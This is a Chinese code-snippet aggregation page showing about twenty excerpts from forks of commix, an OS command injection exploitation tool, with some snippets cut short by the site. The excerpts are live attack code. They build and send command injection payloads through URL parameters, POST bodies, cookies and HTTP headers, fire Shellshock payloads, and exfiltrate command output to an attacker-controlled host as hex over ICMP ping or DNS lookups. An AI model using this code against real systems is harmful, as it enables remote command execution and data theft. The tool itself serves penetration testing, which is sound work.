本文整理汇总了Python中src.utils.settings.print_payload函数的典型用法代码示例。如果您正苦于以下问题:Python print_payload函数的具体用法?Python print_payload怎么用?Python print_payload使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了print_payload函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: cmd_exec
def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
global add_new_line
# ICMP exfiltration payload.
payload = ("; " + cmd + " | xxd -p -c" + str(exfiltration_length) + " | while read line; do ping -p $line -c1 -s" + str(exfiltration_length * 2) + " -q " + ip_src + "; done")
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Executing the '" + cmd + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
if http_request_method == "GET":
url = url.replace(settings.INJECT_TAG, "")
data = payload.replace(" ", "%20")
req = url + data
else:
values = {vuln_parameter:payload}
data = urllib.urlencode(values)
req = urllib2.Request(url=url, data=data)
try:
sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
response = urllib2.urlopen(req)
time.sleep(3)
sys.stdout.write(Style.RESET_ALL)
if add_new_line:
print "\n"
add_new_line = True
else:
print ""
except urllib2.HTTPError, err_msg:
print settings.print_critical_msg(str(err_msg.code))
raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:35,代码来源:icmp_exfiltration.py
示例2: cmd_exec
def cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter):
# DNS exfiltration payload.
payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do host $line.xxx " + dns_server + "; done")
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
sys.stdout.write("\n" + settings.print_payload(payload))
if http_request_method == "GET":
url = url.replace(settings.INJECT_TAG, "")
data = payload.replace(" ", "%20")
req = url + data
else:
values = {vuln_parameter:payload}
data = urllib.urlencode(values)
req = urllib2.Request(url=url, data=data)
sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
response = urllib2.urlopen(req)
time.sleep(2)
sys.stdout.write("\n" + Style.RESET_ALL)
开发者ID:aventado,项目名称:commix,代码行数:21,代码来源:dns_exfiltration.py
示例3: cmd_exec
def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
# ICMP exfiltration payload.
payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do ping -p $line -c 1 -s16 -q " + ip_src + "; done")
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + settings.print_payload(payload))
if http_request_method == "GET":
url = url.replace(settings.INJECT_TAG, "")
data = payload.replace(" ", "%20")
req = url + data
else:
values = {vuln_parameter:payload}
data = urllib.urlencode(values)
req = urllib2.Request(url=url, data=data)
sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
response = urllib2.urlopen(req)
time.sleep(2)
sys.stdout.write("\n" + Style.RESET_ALL)
print ""
开发者ID:ardiansn,项目名称:commix,代码行数:22,代码来源:icmp_exfiltration.py
示例4: check_for_shell
def check_for_shell(url, cmd, cve, check_header, filename):
try:
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
cmd = "echo " + TAG + "$(" + cmd + ")" + TAG
payload = shellshock_exploitation(cve, cmd)
info_msg = "Executing the '" + cmd + "' command... "
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write(settings.print_info_msg(info_msg))
elif settings.VERBOSITY_LEVEL > 1:
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
if settings.VERBOSITY_LEVEL >= 1:
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
header = {check_header : payload}
request = urllib2.Request(url, None, header)
if check_header == "User-Agent":
menu.options.agent = payload
else:
menu.options.agent = default_user_agent
log_http_headers.do_check(request)
log_http_headers.check_http_traffic(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
response = proxy.use_proxy(request)
# Check if defined Tor.
elif menu.options.tor:
response = tor.use_tor(request)
else:
response = urllib2.urlopen(request)
shell = response.read().rstrip().replace('\n',' ')
shell = re.findall(r"" + TAG + "(.*)" + TAG, shell)
shell = ''.join(shell)
return shell, payload
except urllib2.URLError, err_msg:
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:39,代码来源:shellshock.py
示例5: check_injection
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
payload = payload.replace(" ","%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
开发者ID:security-geeks,项目名称:commix,代码行数:94,代码来源:fb_injector.py
示例6: tfb_injection_handler
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
possibly_vulnerable = False
false_positive_warning = False
how_long_statistic = []
export_injection_info = False
how_long = 0
injection_type = "semi-blind command injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = settings.MAXLEN
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
err_msg = "The '--url-reload' option is not available in " + technique + "!"
print settings.print_critical_msg(err_msg)
whitespace = checks.check_whitespaces()
if settings.VERBOSITY_LEVEL >= 1:
info_msg ="Testing the " + technique + "... "
print settings.print_info_msg(info_msg)
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
if settings.LOAD_SESSION:
cmd = shell = ""
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
settings.FOUND_HOW_LONG = how_long
settings.FOUND_DIFF = how_long - delay
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
else:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
# Encode payload to Base64
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
#.........这里部分代码省略.........
开发者ID:dtrip,项目名称:commix,代码行数:101,代码来源:tfb_handler.py
示例7: cb_injection_handler
def cb_injection_handler(url, timesec, filename, http_request_method):
shell = False
counter = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "results-based OS command injection"
technique = "classic command injection technique"
if not settings.LOAD_SESSION:
info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
if settings.VERBOSITY_LEVEL >= 1:
print ""
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
for whitespace in settings.WHITESPACE:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
if whitespace == " ":
whitespace = urllib.quote(whitespace)
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# If a previous session is available.
if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type):
try:
settings.CLASSIC_STATE = True
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
except TypeError:
err_msg = "An error occurred while accessing session file ('"
err_msg += settings.SESSION_FILE + "'). "
err_msg += "Use the '--flush-session' option."
print settings.print_critical_msg(err_msg)
raise SystemExit()
else:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
# Define alter shell
alter_shell = menu.options.alter_shell
try:
if alter_shell:
# Classic -alter shell- decision payload (check if host is vulnerable).
payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.decision(separator, TAG, randv1, randv2)
# Define prefixes & suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
print settings.print_payload(payload)
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print settings.print_info_msg(info_msg)
print settings.print_payload(payload)
# Cookie header injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie header injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent HTTP header injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent HTTP header injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer HTTP header injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer HTTP header injection.
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:cb_handler.py
示例8: check_injection
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
else:
payload = eb_payloads.cmd_execution(separator, TAG, cmd)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Fixation for specific payload.
if ")%3B" + urllib.quote(")}") in payload:
payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Executing the '" + cmd + "' command: "
sys.stdout.write("\n" + settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
开发者ID:BMaChina,项目名称:commix,代码行数:86,代码来源:eb_injector.py
示例9: shellshock_handler
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
info_msg = "Testing the " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + settings.print_payload(payload))
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent )+ "%"
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
if cve in response.info():
no_result = False
success_msg = "The (" + check_header + ") '" + Style.UNDERLINE
success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
print "\n" + settings.print_success_msg(success_msg)
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
if not menu.options.verbose:
print ""
# Enumeration options.
if settings.ENUMERATION_DONE == True :
if menu.options.verbose:
print ""
while True:
question_msg = "Do you want to enumerate again? [Y/n/q] > "
enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
if enumerate_again in settings.CHOICE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOICE_NO:
break
elif enumerate_again in settings.CHOICE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
err_msg = "'" + enumerate_again + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
question_msg = "Do you want to access files again? [Y/n/q] > "
file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
if file_access_again in settings.CHOICE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOICE_NO:
break
#.........这里部分代码省略.........
开发者ID:ardiansn,项目名称:commix,代码行数:101,代码来源:shellshock.py
示例10: check_for_shell
header = { check_header : payload }
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
shell = response.read().rstrip()
return shell, payload
except urllib2.URLError, err_msg:
print "\n" + settings.print_error_msg(err_msg)
sys.exit(0)
shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
if len(shell) == 0:
cmd = "/bin/" + cmd
shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
if menu.options.verbose and len(shell) > 0:
sys.stdout.write("\n" + settings.print_payload(payload))
if len(shell) == 0:
cmd = "/usr" + cmd
shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
if menu.options.verbose and len(shell) > 0:
sys.stdout.write("\n" + settings.print_payload(payload))
return shell, payload
"""
The exploitation function.
(call the injection handler)
"""
def exploitation(url, http_request_method, filename):
if shellshock_handler(url, http_request_method, filename) == False:
return False
开发者ID:ardiansn,项目名称:commix,代码行数:31,代码来源:shellshock.py
示例11: fb_injection_handler
def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response):
shell = False
counter = 1
vp_flag = True
exit_loops = False
no_result = True
is_encoded = False
stop_injection = False
call_tmp_based = False
next_attack_vector = False
export_injection_info = False
injection_type = "semi-blind command injection"
technique = "file-based command injection technique"
tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response)
if not settings.LOAD_SESSION or settings.RETEST == True:
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
info_msg = "Trying to create a file in '" + settings.WEB_ROOT
info_msg += "' for command execution results... "
print settings.print_info_msg(info_msg)
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for whitespace in settings.WHITESPACE:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# If a previous session is available.
if settings.LOAD_SESSION:
try:
settings.FILE_BASED_STATE = True
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
OUTPUT_TEXTFILE = TAG + ".txt"
session_handler.notification(url, technique, injection_type)
if technique == "tempfile-based injection technique":
#settings.LOAD_SESSION = True
tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response)
except TypeError:
err_msg = "An error occurred while accessing session file ('"
err_msg += settings.SESSION_FILE + "'). "
err_msg += "Use the '--flush-session' option."
print settings.print_critical_msg(err_msg)
raise SystemExit()
if settings.RETEST == True:
settings.RETEST = False
from src.core.injections.results_based.techniques.classic import cb_handler
cb_handler.exploitation(url, timesec, filename, http_request_method)
if not settings.LOAD_SESSION:
i = i + 1
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Check if defined "--verbose" option.
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print settings.print_info_msg(info_msg)
print settings.print_payload(payload)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie header injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:fb_handler.py
示例12: false_positive_check
def false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response):
found_chars = False
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the reliability of used payload... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
for output_length in range(1, 3):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
how_long = custom_header_injection_test(url, vuln_parameter, payload)
else:
how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)
if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF):
found_chars = True
break
if found_chars == True :
num_of_chars = output_length + 1
check_start = 0
check_end = 0
check_start = time.time()
output = []
percent = 0
for num_of_chars in range(1, int(num_of_chars)):
for ascii_char in range(1, 3):
# Get the execution ouput, of shell execution.
if alter_shell:
payload = tfb_payloads.fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
else:
payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
#.........这里部分代码省略.........
开发者ID:BMaChina,项目名称:commix,代码行数:101,代码来源:tfb_injector.py
示例13: eb_injection_handler
def eb_injection_handler(url, delay, filename, http_request_method):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "Results-based Command Injection"
technique = "eval-based code injection technique"
for item in range(0, len(settings.EXECUTION_FUNCTIONS)):
settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "("
settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS
url = eb_injector.warning_detection(url, http_request_method)
if not settings.LOAD_SESSION:
info_msg = "Testing the " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES)
for whitespace in settings.WHITESPACE:
for prefix in settings.EVAL_PREFIXES:
for suffix in settings.EVAL_SUFFIXES:
for separator in settings.EVAL_SEPARATORS:
# If a previous session is available.
if settings.LOAD_SESSION and session_handler.notification(url, technique):
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
if settings.RETEST == True:
settings.RETEST = False
from src.core.injections.results_based.techniques.classic import cb_handler
cb_handler.exploitation(url, delay, filename, http_request_method)
if not settings.LOAD_SESSION:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
# Define alter shell
alter_shell = menu.options.alter_shell
try:
if alter_shell:
# Classic -alter shell- decision payload (check if host is vulnerable).
payload = eb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
else:
# Classic decision payload (check if host is vulnerable).
payload = eb_payloads.decision(separator, TAG, randv1, randv2)
suffix = urllib.quote(suffix)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Fixation for specific payload.
if ")%3B" + urllib.quote(")}") in payload:
